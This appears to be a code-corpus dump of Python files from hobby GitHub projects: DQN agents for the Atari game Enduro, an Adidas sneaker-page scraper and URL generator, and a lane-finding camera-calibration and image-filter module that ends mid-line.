tf.placeholder(tf.float32, [None, self.n_features], name='s_') # input\n with tf.variable_scope('target_net'):\n c_names = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n\n self.q_next = build_layers(self.s_, c_names, n_l1, w_initializer, b_initializer)\n\n def store_transition(self, s, a, r, s_):\n if not hasattr(self, 'memory_counter'):\n self.memory_counter = 0\n transition = np.hstack((s, [a, r], s_))\n index = self.memory_counter % self.memory_size\n self.memory[index, :] = transition\n self.memory_counter += 1\n\n def choose_action(self, observation): #从此处入口\n observation = observation[np.newaxis, :]\n actions_value = self.sess.run(self.q_eval, feed_dict={self.s: observation})\n action = np.argmax(actions_value)\n\n if not hasattr(self, 'q'): # record action value it gets 记录选择的 Qmax 值\n self.q = []\n self.running_q = 0\n self.running_q = self.running_q*0.99 + 0.01 * np.max(actions_value)\n self.q.append(self.running_q)\n\n if np.random.uniform() > self.epsilon: # choosing action随机\n action = np.random.randint(0, self.n_actions)\n return action\n\n def learn(self):\n #这一段和 DQN 一样\n if self.learn_step_counter % self.replace_target_iter == 0:\n self.sess.run(self.replace_target_op)\n print('\\ntarget_params_replaced\\n')\n\n if self.memory_counter > self.memory_size:\n sample_index = np.random.choice(self.memory_size, size=self.batch_size)\n else:\n sample_index = np.random.choice(self.memory_counter, size=self.batch_size)\n batch_memory = self.memory[sample_index, :]\n\n #这一段和 DQN 不一样\n q_next, q_eval4next = self.sess.run( #一个是 Qnext 神经网络,一个是 Qevlauation 神经网络 后者是现实中用 Q 估计出来的值\n [self.q_next, self.q_eval],\n feed_dict={self.s_: batch_memory[:, -self.n_features:], # next observation\n self.s: batch_memory[:, -self.n_features:]}) # next observation\n q_eval = self.sess.run(self.q_eval, {self.s: batch_memory[:, :self.n_features]}) #t 时刻真正的值\n\n q_target = q_eval.copy()\n\n batch_index = np.arange(self.batch_size, dtype=np.int32)\n eval_act_index = batch_memory[:, self.n_features].astype(int)\n reward = batch_memory[:, self.n_features + 1]\n\n if self.double_q:# 最大的不同和 DQN 相比 如果是 double 时候\n max_act4next = np.argmax(q_eval4next, axis=1) # the action that brings the highest value is evaluated by q_eval\n # 下, DDQN选择 q_next 依据 q_eval 选出的动作. # 上,q_eval 得出的最高奖励动作.\n selected_q_next = q_next[batch_index, max_act4next] # Double DQN, select q_next depending on above actions\n else: #如果是普通 DQN\n selected_q_next = np.max(q_next, axis=1) # the natural DQN\n\n q_target[batch_index, eval_act_index] = reward + self.gamma * selected_q_next\n #下面和 DQN 一样\n _, self.cost = self.sess.run([self._train_op, self.loss],\n feed_dict={self.s: batch_memory[:, :self.n_features],\n self.q_target: q_target})\n self.cost_his.append(self.cost)\n\n self.epsilon = self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n self.learn_step_counter += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6867289543151855,
"alphanum_fraction": 0.7244859933853149,
"avg_line_length": 29.724138259887695,
"blob_id": "ead2cd0fff6305fdd082b62fcb9d3092a9f9070f",
"content_id": "ef34dba75cf599e0189e9e1b9bdbebb861d89598",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2675,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 87,
"path": "/Gym_Enduro/DRL_enduro.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 28 10:59:10 2018\nDRL for Atatri Enduro-v0 game\nbased on: https://github.com/matrixBT/DQN-Atari-Enduro/blob/master/Dqn_atari_Enduro.ipynb\n@author: Morgan\n\"\"\"\nfrom __future__ import division\nfrom time import sleep\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n#%matplotlib inline\nfrom PIL import Image\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Flatten, Dropout, concatenate, Permute\nfrom keras.layers import Input, Conv2D\nfrom keras.optimizers import Adam\nfrom keras.activations import relu, linear\nfrom keras.layers.advanced_activations import LeakyReLU\n\n\nfrom rl.agents.dqn import DQNAgent\nfrom rl.policy import LinearAnnealedPolicy, EpsGreedyQPolicy\nfrom rl.memory import SequentialMemory\nfrom rl.core import Processor\n\n\n# envrionment\nenv = gym.make('Enduro-v0')\n\nenv.render()\nsleep(1)\nenv.close()\n\nnb_actions = env.action_space.n\nprint('Total number of Possible actoin is :', nb_actions)\n\nframe_shape = (84, 84)\nwindow_length = 4\ninput_shape = (window_length,) + frame_shape\nprint('Input Shape is :', input_shape)\n\nclass GameProcess(Processor):\n def process_observation(self, observation):\n img = Image.fromarray(observation)\n img = np.array(img.resize(frame_shape).convert('L'))\n return img.astype('uint8') \n\n def process_state_batch(self, batch):\n Processed_batch = batch.astype('float32') / 255.\n return Processed_batch\n\n def process_reward(self, reward):\n return np.clip(reward, -1., 1.)\n \nmodel = Sequential()\nmodel.add(Permute((2, 3, 1), input_shape=input_shape))\nmodel.add(Conv2D(32, (8, 8), strides=(4, 4)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (4, 4), strides=(2, 2)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3), strides=(1, 1)))\nmodel.add(Activation('relu'))\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dense(nb_actions))\nmodel.add(Activation('linear'))\nprint(model.summary()) \n \n# allocating memory for experience replay\nmemory = SequentialMemory(limit=1000000, window_length=window_length) \n\n# Epsilon Greedy Exploration\npolicy = LinearAnnealedPolicy(EpsGreedyQPolicy(), attr='eps', value_max=1., value_min=.1, value_test=.05, nb_steps=1000000)\n\n# Compiling DQN Agent\ndqn = DQNAgent(model=model, nb_actions=nb_actions, policy=policy, memory=memory, processor=GameProcess(),\n nb_steps_warmup=50000, gamma=.99, target_model_update=10000, train_interval=4, delta_clip=1.)\n\ndqn.compile(Adam(lr=.00025), metrics=['mae'])\n\nhistory = dqn.fit(env, nb_steps=500000)\n\n\n"
},
{
"alpha_fraction": 0.5569892525672913,
"alphanum_fraction": 0.6924731135368347,
"avg_line_length": 15.034482955932617,
"blob_id": "8f97a0f86c600aecc06f3c6c88f401d414fd8b84",
"content_id": "95ede0c04e9d3588fbec9a1dda6c73b9c3d82705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 29,
"path": "/Gym_Enduro/configure.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 29 18:20:06 2018\n\n@author: menghaw1\n\"\"\"\n\nENV_NAME = 'Enduro-v0'\nRENDER = 1\nNUM_EPISODES = 5000\nNUM_EP_STEPS = 3000\nMEMEOY_SIZE = 50000 # adjustable\nLOG_PATH = \"Enduro_log/Dueling1\"\n\nTRAIN_FREQUENCY = 2\n\n# Hyperparameter\nLR = 0.00025\nGAMMA = .99\nREPLACE_TARGET = 1000\nBATCH_SIZE = 32\n\n#learning_rate=0.001\n#reward_decay=0.9\n#e_greedy=0.9\n#replace_target_iter=200\n#memory_size=3000\n#batch_size=32\n"
},
{
"alpha_fraction": 0.5130080580711365,
"alphanum_fraction": 0.5420541167259216,
"avg_line_length": 48.21243667602539,
"blob_id": "9d138f96fffa3675a06446f52c8c20754baf75ab",
"content_id": "2f5d1fa8bfbc25ce93d4689ae48b556ea0e1baa5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9733,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 193,
"path": "/Gym_Enduro/DuelingDQN.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 30 13:02:11 2018\n@author: menghaw1\nTodo: utilize n_features argument.\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom collections import deque\nimport random\n\nclass DuelingDQN: # Dueling network and DQN network\n \n def __init__( # 默认参数放在前面\n self,\n n_actions,\n n_features,\n learning_rate=0.001,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=200,\n memory_size=3000,\n batch_size=32,\n e_greedy_increment=None,\n output_graph=True,\n dueling=True,\n sess=None,\n ):\n self.n_actions = n_actions\n self.n_features = n_features\n self.lr=learning_rate\n self.gamma=reward_decay\n self.epsilon_max = e_greedy\n self.replace_target_iter = replace_target_iter #隔了多少部更换 Q 值\n self.memory_size = memory_size\n self.batch_size = batch_size#随机梯度下降用到\n self.epsilon_increment = e_greedy_increment\n self.epsilon = 0 if e_greedy_increment is not None else self.epsilon_max \n # total learning step\n self.learn_step_counter = 0#学习时记录多少步 ,用于判断是否更换 target net 参数\n # initialize zero memory [s, a, r, s_]\n #self.memory = np.zeros((self.memory_size, n_features * 2 + 2))#存储记忆长✖️高 建立上一行的矩阵\n self.M = deque(maxlen=self.memory_size)\n # consist of [target_net, evaluate_net]\n \n self.build_network()\n t_params = tf.get_collection('target_net_params') #提取 target net 的参数\n e_params = tf.get_collection('eval_net_params') #tiqu eval net 的参数\n self.replace_target_op = [tf.assign(t, e) for t, e in zip(t_params, e_params)]#把 t 的值变为 e 的值 #更新目标网络参数\n \n self.sess = sess\n self.sess.run(tf.global_variables_initializer())\n \n def build_network(self):\n# def setInitState(self,observation):\n# self.currentState = np.stack((observation, observation, observation, observation), axis = 2) \n# def weight_variable(shape):\n# initial = tf.truncated_normal(shape, stddev = 0.01)\n# return tf.Variable(initial) \n# def bias_variable(shape):\n# initial = tf.constant(0.01, shape = shape)\n# return tf.Variable(initial) \n def conv2d(x, W, stride):\n return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"VALID\") \n# def max_pool_2x2(x):\n# return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\n \n def build_layers(s, c_name): \n # inputs layer\n #s = tf.placeholder('float', [None, 80, 80, 4]) \n# W_conv1 = weight_variable([8,8,4,32]) #(filter_height, filter_width, in_channels, out_channels)\n# b_conv1 = bias_variable([32]) \n# W_conv2 = weight_variable([4,4,32,64])\n# b_conv2 = bias_variable([64]) \n# W_conv3 = weight_variable([3,3,64,64])\n# b_conv3 = bias_variable([64]) \n# W_fc1 = weight_variable([2304,512]) # search how to compute number of cell\n# b_fc1 = bias_variable([512]) \n# W_fc2 = weight_variable([512, self.n_actions])\n# b_fc2 = bias_variable([self.n_actions])\n \n w_init = tf.random_normal_initializer(0., 0.3)\n b_init = tf.constant_initializer(0.1)\n # input layer\n \n #stateinput = tf.placeholder('float',[None,80,80,4])\n with tf.variable_scope('conv1'): \n w_c1 = tf.get_variable('w_c1', [8,8,4,32], initializer=w_init, collections=c_name)\n b_c1 = tf.get_variable('b_c1', [1,32], initializer=b_init, collections=c_name)\n conv1 = tf.nn.relu(conv2d(s,w_c1,4)+b_c1)\n with tf.variable_scope('conv2'): \n w_c2 = tf.get_variable('w_c2', [4,4,32,64], initializer=w_init, collections=c_name)\n b_c2 = tf.get_variable('b_c2', [1,64], initializer=b_init, collections=c_name)\n conv2 = tf.nn.relu(conv2d(conv1,w_c2,2)+b_c2)\n with tf.variable_scope('conv3'): \n w_c3 = tf.get_variable('w_c3', [3,3,64,64], initializer=w_init, collections=c_name)\n b_c3 = tf.get_variable('b_c3', [1,64], initializer=b_init, collections=c_name)\n conv3 = tf.nn.relu(conv2d(conv2,w_c3,1)+b_c3)\n conv3_flat = tf.reshape(conv3,[-1,2304])\n with tf.variable_scope('fc1'): \n w_f1 = tf.get_variable('w_f1', [2304,512], initializer=w_init, collections=c_name)\n b_f1 = tf.get_variable('b_f1', [1,512], initializer=b_init, collections=c_name)\n fc1 = tf.nn.relu(tf.matmul(conv3_flat,w_f1)+b_f1)\n #Q value\n with tf.variable_scope('fc2'): \n w_f2 = tf.get_variable('w_f2', [512, self.n_actions], initializer=w_init, collections=c_name)\n b_f2 = tf.get_variable('b_f2', [1, self.n_actions], initializer=b_init, collections=c_name)\n out = tf.matmul(fc1, w_f2) + b_f2 \n return out \n # -----------------build evaluate net-----------------#\n self.s = tf.placeholder(tf.float32,[None,80,80,4]) # replace it with features shape \n self.q_target = tf.placeholder(tf.float32,[None, self.n_actions])\n \n with tf.variable_scope('eval_net'):\n c_name = ['eval_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n self.q_eval = build_layers(self.s, c_name)\n with tf.variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.q_target, self.q_eval))\n with tf.variable_scope('train'):\n self._train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n \n # -----------------build target net-----------------#\n self.s_ = tf.placeholder(tf.float32, [None,80,80,4])\n with tf.variable_scope('target_net'):\n c_name = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n self.q_next = build_layers(self.s_, c_name) \n \n def choose_action(self, state): # state is an array , shape (1,80,80,4)\n #observation = tf.convert_to_tensor(state)\n #observation = tf.reshape(observation, [-1, 80, 80, 1]) # (batch, in_height, in_width, in_channels) \n #observation = observation[np.newaxis, :]\n #observation = np.stack((state, state, state, state), axis = -1) # shape:(1, 80, 80, 4)\n actions_value = self.sess.run(self.q_eval, feed_dict={self.s: state})\n action = np.argmax(actions_value)\n if np.random.uniform() > self.epsilon:\n action = np.random.randint(0, self.n_actions) \n return action\n \n def remember(self, s, a, r, s_): # s is an array (1, 80, 80, 4),\n if not hasattr(self, 'memory_counter'): # it returns true if an object has the given name attribute. vice versa.\n self.memory_counter = 0 \n # \n s = s.reshape((80,80,4))\n s_ = s_.reshape((80,80,4))\n \n self.M.append((s, a, r, s_))\n \n #transition = np.hstack((s, [a, r], s_))# if this doesn't work, plz use deque as memory\n #index = self.memory_counter % self.memory_size\n #self.memory[index, :] = transition\n self.memory_counter += 1\n \n def learn(self): # very slow when it learning...\n # target network\n if self.learn_step_counter % self.replace_target_iter == 0:\n self.sess.run(self.replace_target_op)\n print('\\ntarget_params_replaced\\n') \n #sample_index = np.random.choice(min(self.memory_size, self.memory_counter), size=self.batch_size)\n# if self.memory_counter > self.memory_size:\n# sample_index = np.random.choice(self.memory_size, size=self.batch_size)\n# else:\n# sample_index = np.random.choice(self.memory_counter, size=self.batch_size)\n #batch_memory = self.M[sample_index] # sample_index is array([..,..,..,...])\n \n batch_memory = random.sample(self.M, self.batch_size)\n s_batch = [d[0] for d in batch_memory]\n a_batch = [d[1] for d in batch_memory]\n r_batch = [d[2] for d in batch_memory]\n s_batch_ = [d[3] for d in batch_memory]\n q_next = self.sess.run(self.q_next, feed_dict={self.s_: s_batch_})# next observation\n\n q_eval = self.sess.run(self.q_eval, {self.s: s_batch})\n \n q_target = q_eval.copy()\n \n batch_index = np.arange(self.batch_size, dtype=np.int32)\n \n #eval_act_index = a_batch.astype(int)\n #reward = batch_memory[:,]\n \n q_target[batch_index, a_batch] = r_batch + self.gamma * np.max(q_next, axis=1) # DQN\n\n _, self.cost = self.sess.run([self._train_op, self.loss],\n feed_dict={self.s: s_batch,\n self.q_target: q_target})\n #print('cost:', self.cost)\n #tf.summary.scalar('cost',self.cost)\n self.epsilon = self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n self.learn_step_counter += 1\n \n #return self.cost\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n "
}
] | 15 |
Gareebear/Projects
|
https://github.com/Gareebear/Projects
|
b79144eac575df075069176679e07019e9729e47
|
a686c5ef2a676d0f21e455870360e3d5f6531e8f
|
dd44555f6ec386b29442b8bf59a87dcb644918ee
|
refs/heads/master
| 2020-05-21T11:08:41.177841 | 2018-11-25T01:54:34 | 2018-11-25T01:54:34 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6034482717514038,
"alphanum_fraction": 0.6256157755851746,
"avg_line_length": 32.91666793823242,
"blob_id": "68b01f7e9b29324e0cdf81217cfb2eed406233d9",
"content_id": "0bed07a15666ceca039ccfce05f393a9f8a173ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 12,
"path": "/URLGen.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "def URLGen(model, size):\n BaseSize = 580 #For shoe size 6.5\n ShoeSize = float(size) - 6.5\n ShoeSize *= 20 #Generates our size code\n RawSize = ShoeSize + BaseSize\n SizeCode = int(RawSize)\n URL = 'https://www.adidas.com/us/' + str(model) + '.html?forceSelSize=' + str(model) + '_' + str(SizeCode)\n return URL\n\n#Model = input('Model #:')\n#Size = input('Size: ')\n#print(URLGen(Model,Size))"
},
{
"alpha_fraction": 0.643784761428833,
"alphanum_fraction": 0.654916524887085,
"avg_line_length": 31.636363983154297,
"blob_id": "045e5ff3316b91a6d4a3ff654cc5521b9d778fb0",
"content_id": "e2e176c3978ece77285af41c626de4931924ff19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1078,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 33,
"path": "/Bot.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "import bs4 \nfrom selenium import webdriver\nimport os\n\ndef render_page(url,agent): #Loads page for processing\n chromedriver = \"./chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n options.add_argument('--headless')\n options.add_argument(f'user-agent={agent}')\n driver = webdriver.Chrome(chromedriver)\n driver.get(url)\n r = driver.page_source\n return r\n\ndef URLGen(model, size): #Generates URLs\n BaseSize = 580 #For shoe size 6.5\n ShoeSize = float(size) - 6.5\n ShoeSize *= 20 #Generates our size code\n RawSize = ShoeSize + BaseSize\n SizeCode = int(RawSize)\n URL = 'https://www.adidas.com/us/' + str(model) + '.html?forceSelSize=' + str(model) + '_' + str(SizeCode)\n return URL\n\ndef GetSizes(url): #Returns all available sizes\n response = render_page(url)\n page = bs4.BeautifulSoup(response,\"lxml\")\n print(page.title.string)\n l = page.find_all('div',{\"class\" : \"gl-square-list__cta\"})\n sizes = []\n for i in range(0,len(l)):\n print(l[i].text)\n sizes.append(l[i].text)\n return sizes\n\n"
},
{
"alpha_fraction": 0.5954875349998474,
"alphanum_fraction": 0.6809024810791016,
"avg_line_length": 28.547618865966797,
"blob_id": "e862ebc7591ca263a9586ded17e07add40009930",
"content_id": "16f408c1a74402e57509cf19d4e02eff7cf888cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 42,
"path": "/Scraper.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "import requests\nimport bs4 \nfrom selenium import webdriver\nimport random\nimport os\nimport time\n\nagent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n\ndef render_page(url):\n #Grabs our Chrome Driver and sets PATH\n chromedriver = \"./chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument(f'user-agent={agent}')\n driver = webdriver.Chrome(chromedriver,options=options)\n driver.get(url)\n #time.sleep(2)\n r = driver.page_source\n return r\n\n\n#headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}\n#proxies = {\n# \"https\": 'https://37.53.83.40:34934',\n# \"https\": 'https://139.0.23.188:32551'\n#}\n\n#url = 'https://www.adidas.com/us/F36156.html?forceSelSize=F36156_600'\n#response = render_page(url)\n#page = bs4.BeautifulSoup(response,\"lxml\")\n#print(page.title.string)\n#l = page.find_all('div',{\"class\" : \"gl-square-list__cta\"})\n\n#sizes = []\n\n#for i in range(0,len(l) - 1):\n# print(l[i].text)\n# sizes.append(l[i].text)\n\n#print(sizes)\n"
},
{
"alpha_fraction": 0.5856603980064392,
"alphanum_fraction": 0.6120754480361938,
"avg_line_length": 29.837209701538086,
"blob_id": "24404e9f4bf39f1a8905701b18298492a91bcdbc",
"content_id": "45519a90322d7b7409e8491445bc29524af85ecb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1325,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 43,
"path": "/Spider.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport Scraper\nfrom Utils import isInt\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}\n#Find max product page\ndef findMaxPage():\n baseURL = 'https://www.adidas.com/us/men-shoes'\n res = requests.get(baseURL,headers=headers)\n page = BeautifulSoup(res.text,'lxml')\n pageindex = page.find_all('li',{'class':'gl-dropdown__option'})\n pagenumbers = []\n pages = []\n for index in pageindex:\n if isInt(index.text):\n pagenumbers.append(int(index.text))\n\n for i in range(0,len(pagenumbers)):\n if i == 0:\n pages.append(baseURL)\n else:\n index = \"?start=\" + str(i * 48)\n pages.append(baseURL + index)\n return pages\n\n#Find all products href\ndef findProducts():\n pages = findMaxPage()\n res = []\n page = []\n products = []\n for i in range(0,len(pages)):\n res.append(requests.get(pages[i],headers=headers))\n page.append( BeautifulSoup(res[i].text,'lxml') )\n products = page[i].find_all('div',{'class':'gl-product-card__details'})\n for a in products:\n b = a.find('a',href=True)\n products.append(b['href'])\n \n return products\n\nfindProducts()"
}
] | 4 |
JJMats/lane_finding
|
https://github.com/JJMats/lane_finding
|
9412f0cfac5f6a33b49e7f608a57bea39540e2c7
|
0eec373965f08c1b296dc4167c7c658d2d943571
|
64c80320f60c0020dceea8fe08f16a1dcbe495d8
|
refs/heads/master
| 2020-07-11T00:24:20.899036 | 2019-09-06T07:09:15 | 2019-09-06T07:09:15 | 204,408,569 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.788309633731842,
"alphanum_fraction": 0.788309633731842,
"avg_line_length": 69.33333587646484,
"blob_id": "bd6d30f78ad1d449eceec7c37862df8c0dae6445",
"content_id": "fa575857d0f09ed895432b37aa6354dd54006129",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 350,
"num_lines": 9,
"path": "/README.md",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "## Lane Finding\n\n### Description\n\nLane finding app for the Jetson Nano Development Board.\n\nThis is a work in progress! The plan here is to extract the filters, helper functions, and classes from the Advanced Lane Finding Jupyter notebook into Python scripts. Then, I would like to assemble a pipeline to pull images from a live camera and overlay the detected lane image on top of them. This video can then be saved to disk for later review.\n\nAdditional thoughts include ROS integration, receiving vehicle CAN data for additional live overlays (throttle position, brake, vehicle speed, etc.). I also plan to rewrite this all in C++.\n"
},
{
"alpha_fraction": 0.6399155259132385,
"alphanum_fraction": 0.6504752039909363,
"avg_line_length": 26.852941513061523,
"blob_id": "e8780fb71e4c77e32004ea511c3b2581a7d18dda",
"content_id": "c1d5f12d5718dffc9a01618804893669d85bba5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1894,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 68,
"path": "/camera_cal.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "import os, glob, cv2\nimport numpy as np\nimport matplotlib.image as mpimg\n\n# Get camera calibration images\n# TODO: Move this into a function that will calibrate the camera\n# and return the calibration matrix.\ncamera_cal_img_files = glob.glob(\"images/camera_cal/calibration*\")\n\ndef cal_camera(img, obj_points, img_points):\n '''\n Take an image, object points, and image points, calibrate the camera,\n then correct and return an undistorted version of the image.\n\n Returns ret, mtx, dist, rvecs, tvecs\n '''\n\n return cv2.calibrateCamera(obj_points, img_points, img.shape[1:3], None, None)\n\n\ndef undistort_image(img, mtx, dist):\n '''\n Take an image and camera calibration values, undistort the image, and \n return it.\n '''\n\n return cv2.undistort(img, mtx, dist, None, mtx)\n\n\ndef import_calibration_images(img_points, obj_points):\n # Prepare object points\n nx = 9\n ny = 6\n\n # Get known coordinates of the corners in the image\n objp = np.zeros((ny*nx, 3), np.float32)\n\n # Generate x, y-coordinates\n objp[:,:2] = np.mgrid[0:nx, 0:ny].T.reshape(-1,2)\n\n for fname in camera_cal_img_files:\n image = mpimg.imread(fname)\n img = np.copy(image)\n\n # Convert image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # Find chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n if ret == True:\n img_points.append(corners)\n obj_points.append(objp)\n img = cv2.drawChessboardCorners(img, (nx, ny), corners, ret)\n\n\ndef undistort_image(image):\n '''\n Take an image as input, undistort with learned camera calibration\n values.\n '''\n obj_points = []\n img_points = []\n\n ret, mtx, dist, rvecs, tvecs = cal_camera(image, obj_points, img_points)\n img_undst = undistort_image(image, mtx, dist)\n\n return img_undst\n"
},
{
"alpha_fraction": 0.5802013874053955,
"alphanum_fraction": 0.6159409880638123,
"avg_line_length": 31.799999237060547,
"blob_id": "662a4c6bb8169e815bd7eb881a240be3ccea245d",
"content_id": "a9d41831830353d1b6d2decdff3a5f3dc575c572",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7051,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 215,
"path": "/filters.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "# Image filtering functions\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport helpers\n\ndef abs_sobel_thresh(image, orient='x', kernel_size=3, thresh=(0, 255)):\n img = np.copy(image)\n \n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n #Take the derivative in the axis specified by the orient parameter\n if orient=='x':\n sobel = cv2.Sobel(gray, cv2.CV_64F, 1, 0, kernel_size)\n else:\n sobel = cv2.Sobel(gray, cv2.CV_64F, 0, 1, kernel_size)\n \n # Get the absolute value of the derivative\n sobel_abs = np.absolute(sobel)\n \n # Scale absolute value to 8-bits\n sobel_norm = np.uint8(255*sobel_abs/np.max(sobel_abs))\n \n # Create a mask of 1's where the scaled derivative magnitude is between the threshold parameters\n sobel_bin = np.zeros_like(sobel_norm)\n sobel_bin[(sobel_norm >= thresh[0]) & (sobel_norm <= thresh[1])] = 1\n \n return sobel_bin\n\n\ndef mag_thresh(image, kernel_size=3, mag_thresh=(0,255)):\n img = np.copy(image)\n \n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # Calculate the derivative in x and y-directions\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=kernel_size)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=kernel_size)\n \n # Calculate the magnitude of the derivative\n sobel_magnitude = np.sqrt(np.square(sobelx) + np.square(sobely))\n \n # Normalize magnitude to 8-bit value\n sobel_magnitude_norm = np.uint8(255 * sobel_magnitude/np.max(sobel_magnitude))\n \n # Create binary mask of values within mag_threshold\n sobel_bin = np.zeros_like(sobel_magnitude_norm)\n sobel_bin[(sobel_magnitude_norm >= mag_thresh[0]) & (sobel_magnitude_norm <= mag_thresh[1])] = 1\n \n # Return the mask\n return sobel_bin\n\n\n# Implement directional filtering\ndef dir_threshold(image, kernel_size=3, thresh=(0, np.pi/2)):\n img = np.copy(image)\n \n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # Calculate the derivative in x and y-directions\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=kernel_size)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=kernel_size)\n \n # Calculate the absolute value of each derivative\n sobelx_abs = np.absolute(sobelx)\n sobely_abs = np.absolute(sobely)\n \n # Calculate the direction of the gradient\n direction = np.arctan2(sobely_abs, sobelx_abs)\n \n binary_output = np.zeros_like(gray)\n binary_output[(direction >= thresh[0])&(direction <= thresh[1])] = 1\n \n return binary_output\n\n\ndef select_lines_in_hls(image):\n img = np.copy(image)\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n \n # Mask for yellow lines\n lower_thresh = np.uint8([10, 0, 100])\n upper_thresh = np.uint8([40, 255, 255])\n yellow_line_mask = cv2.inRange(hls, lower_thresh, upper_thresh)\n \n # Mask for white lines\n lower_thresh = np.uint8([0,180,0])\n upper_thresh = np.uint8([255,255,255])\n white_line_mask = cv2.inRange(hls, lower_thresh, upper_thresh)\n \n # Combine color masks\n cmb_mask = cv2.bitwise_or(yellow_line_mask, 